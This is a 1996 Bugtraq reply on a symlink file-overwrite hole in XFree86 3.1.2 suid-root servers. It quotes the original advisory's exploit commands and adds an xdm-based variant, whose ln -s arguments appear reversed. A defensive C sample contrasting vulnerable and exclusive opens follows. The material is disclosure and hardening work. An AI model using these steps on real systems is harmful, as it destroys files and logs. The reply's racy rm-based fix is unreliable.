Re: XFree86 3.1.2 Security Problems

Anthony C. Zboralski (frantic@worldnet.net)
Tue, 30 Jan 1996 02:51:40 +0100

On Mon, 29 Jan 1996, David J Meltzer wrote:

> Date: Mon, 29 Jan 1996 00:16:46 -0500
> From: David J Meltzer <davem+@andrew.cmu.edu>
> To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
> Subject: XFree86 3.1.2 Security Problems
>
>    There are security holes in XFree86 3.1.2, which installs its servers
> as suid root (/usr/X11R6/bin/XF86_*).  When reading and writing files,
> it does not take proper precautions to ensure that file permissions are
> maintained, resulting in the ability to overwrite files, and to read
> limited portions of other files.
>    The first problem stems from the server opening a temporary file,
> /tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC).  By making this
> file a symlink, the server will overwrite the original file, and then
> write to it its current pid.
>    Other problems exist in the server relating to similar problems, one
> such example is the ability to specify an arbitrary file for the XF86config
> file which will then be opened, and the first line that fails to match
> the expected format will be output with an error, allowing a line to be
> read from an arbitrary file.
>
>                    Program: XFree86 3.1.2 servers
> Affected Operating Systems: All systems with XFree86 3.1.2 installed
>               Requirements: account on system
>            Temporary Patch: chmod o-x /usr/X11R6/bin/XF86*
>        Security Compromise: overwrite arbitrary files
>                     Author: Dave M. (davem@cmu.edu)
>                   Synopsis: While running suid root, XFree86 servers do
>                             not properly check file permissions, allowing
>                             a user to overwrite arbitrary files on a
>                             system.
>
>
> Exploit:
> $ ls -l /var/adm/wtmp
> -rw-r--r--   1 root     root       174104 Dec 30 08:31 /var/adm/wtmp
> $ ln -s /var/adm/wtmp /tmp/.tX0-lock
> $ startx
> (At this point exit X if it started, or else ignore any error messages)
> $ ls -l /var/adm/wtmp
> -r--r--r--   1 root     root           11 Dec 30 08:33 /var/adm/wtmp
>
>

Oh well, if xdm is running, the temporary patch won't do you any good...
Xdm manages a collection of X displays, which may be on the local host
or remote servers. Xdm provides services similar to those provided by
init, getty and login on character terminals: prompting for login
name and password, authenticating the user, and running a ``session.''

Xdm is launched by root.. by default it will start a server on the local
display. If the server crashes for some reason, gets killed or if the user
sends a server abort sequence, it will restart the server..

$ps -ax |grep xdm
   80  ?  S     0:00 xdm
  142  ?  S     0:01 /usr/X11R6/bin/X -auth /usr/X11R6/lib/X11/xdm/A:0-a00080
  179 v03 D     0:00 grep xdm
$ls -l /var/log/wtmp
-rw-r--r--   1 root     root        31864 Jan 30 02:13 /var/log/wtmp
$ ln -s /tmp/.tX0-lock /var/log/wtmp

Now, you switch to the local X display and
send the <Ctrl><Alt><BS> server abort sequence..
Wait until xdm pops up a new server process..
then switch back to shell:

$ls -l /var/log/wtmp
-rw-r--r--   1 root     root           11 Jan 30 02:13 /var/log/wtmp

Xdm doesn't need to kill the server when a user logs out, so the only worry
would be the sending of the abort sequence, easily fixed by uncommenting
the "DontZap" setting in /etc/XF86Config.. but I have seen XF86 crashing
so many times for unguessable reasons that I don't think it will fix the problem.

Maybe someone could take a look at the server sources so it does a
system("/bin/rm /tmp/.tX0-lock") just before it writes to the file..
I don't have 'em handy..
____
\  /__  Anthony C. Zboralski <frantic@worldnet.net>
 \/  /
   \/   Finger <frantic@webbar.imaginet.fr> for PGP Public Key
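As an added, defender-side illustration (not code from the original thread or from XFree86): the O_WRONLY|O_CREAT|O_TRUNC open described in the report placed beside an O_CREAT|O_EXCL form that refuses a pre-planted symlink instead of following it. All function names are assumed, and the victim file and symlink are constructed by the scenario helper.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open the lock file with the given extra open(2) flags and record the
 * pid in the 11-byte "%10ld\n" form seen in the report's ls output. */
static int write_lock(const char *path, int extra_flags, pid_t pid)
{
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%10ld\n", (long)pid);
    int fd = open(path, O_WRONLY | O_CREAT | extra_flags, 0644);
    if (fd < 0) return -1;
    if (write(fd, buf, n) != n) { close(fd); return -1; }
    return close(fd);
}

/* Hardened form: with O_CREAT|O_EXCL, POSIX requires open() to fail with
 * EEXIST whenever the path already exists, a symlink included, so the
 * link is never followed and nothing is truncated. On EEXIST the caller
 * reads the recorded pid and decides whether the lock is stale. */
int create_lock_safe(const char *path, pid_t pid)
{ return write_lock(path, O_EXCL, pid); }

/* Size of the object at path via lstat (a symlink is not followed). */
long file_size(const char *path)
{
    struct stat st;
    return lstat(path, &st) < 0 ? -1 : (long)st.st_size;
}

/* Constructed scenario: a 24-byte victim file with a symlink to it at the
 * lock path. Result bit 1: the hardened open refused the link and left the
 * victim intact; bit 2: the report's O_TRUNC open then cut it to 11 bytes. */
int demo_symlink_scenario(const char *lock_path, const char *victim)
{
    int result = 0, fd;
    unlink(lock_path); unlink(victim);
    if ((fd = open(victim, O_WRONLY | O_CREAT, 0644)) < 0) return 0;
    if (write(fd, "important log data here\n", 24) != 24 || close(fd)) return 0;
    if (symlink(victim, lock_path) < 0) return 0;
    if (create_lock_safe(lock_path, getpid()) < 0 && errno == EEXIST
        && file_size(victim) == 24) result |= 1;
    if (write_lock(lock_path, O_TRUNC, getpid()) == 0 && file_size(victim) == 11)
        result |= 2;
    unlink(lock_path); unlink(victim);
    return result;
}
```

A result of 3 from demo_symlink_scenario means the exclusive open left the victim untouched while the truncating open reduced it to the 11-byte pid line, the same size the ls output in both posts shows.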

